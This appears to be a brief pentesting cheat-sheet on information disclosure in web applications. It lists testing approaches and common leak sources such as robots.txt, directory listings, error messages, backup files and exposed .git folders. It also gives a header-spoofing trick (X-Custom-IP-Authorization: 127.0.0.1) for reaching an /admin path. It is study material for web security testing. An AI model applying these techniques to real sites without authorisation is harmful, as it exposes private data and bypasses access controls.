Page cover image

Information Disclosure

Unintentional release of information from a website.

Test for information disclosure

  • Fuzzing.

  • Using Burp's engagement tools, Search/Find comments/Discover content.

  • Engineering informative responses.

Common sources of information disclosure

Files for Web Crawlers

Check /robots.txt or /sitemap.xml

Directory Listings

Web servers can be configured to automatically list the contents of directories that do not have an index page present.

Developer Comments

Interesting things on in-line HTML/JavaScript comments.

Error Messages

Reveal information in errors.

Debugging Data

Interesting thins in custom error messages for developer debugs.

User Account Pages

Like IDOR vulnerabilities, attacker can access to other user information.

Backup Files

Sensitive data is sometimes even hard-coded within the source code in the backup files.

Insecure Configuration

Test HTTP "TRACE" method because sometimes "/admin" path will be enable if you send a special header like: X-Custom-IP-Authorization: 127.0.0.1

Version Control History

Check ".git" folder and find sensitive data hard-coded within some of the changed lines.

Useful commands

$ git status $ git log $ git checkout

Last updated